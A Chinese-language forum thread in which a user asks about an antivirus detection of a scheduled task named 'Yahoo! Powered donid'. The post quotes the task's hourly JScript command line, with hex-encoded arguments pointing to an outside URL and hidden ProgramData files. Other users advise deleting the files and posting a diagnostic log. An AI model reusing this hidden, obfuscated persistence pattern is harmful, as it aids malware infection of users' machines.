[问题] Yahoo! Powered donid广告程式?

楼主: joexx12 ((X ̄X)uu...)   2018-08-29 12:36:22
最近换了Kaspersky 2019 free后
刚刚电脑 卡巴跳出一个讯息
侦测到恶意程式
HEUR:Trojan.Script.Generic
位置C:\Windows\System32\Tasks\Yahoo! Powered donid
我检查了我的工作排程
里面有个Yahoo! Powered donid
每隔一小时会执行一次
内容为
"C:\ProgramData\{8C024961-0640-C3A7-8086-5DE51AC4D62B}\rola.txt"
"687474703a2f2f7761676e672e636f6d"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c636972697369"
"433a5c50726f6772616d446174615c7b38433032343936312d303634302d433341372d383038362d3544453531414334443632427d5c63657461726f74"
"//B" "//E:jscript" "
作者: DINJIAPC (鼎家)   2018-08-29 15:38:00
上写的几个路境的档案一并杀一杀阿,你还要等第二个中标的共商心得是吗名称就写木马了 有广告或工具取向的pup你还不是要在杀
楼主: joexx12 ((X ̄X)uu...)   2018-08-29 20:01:00
删除是一定删除的 只是想讨论 因为不知道怎发生的 所以才上来问问有没有人遇过
作者: DINJIAPC (鼎家)   2018-08-29 21:08:00
把frst的log跑来在说

Links booklink

Contact Us: admin [ a t ] ucptt.com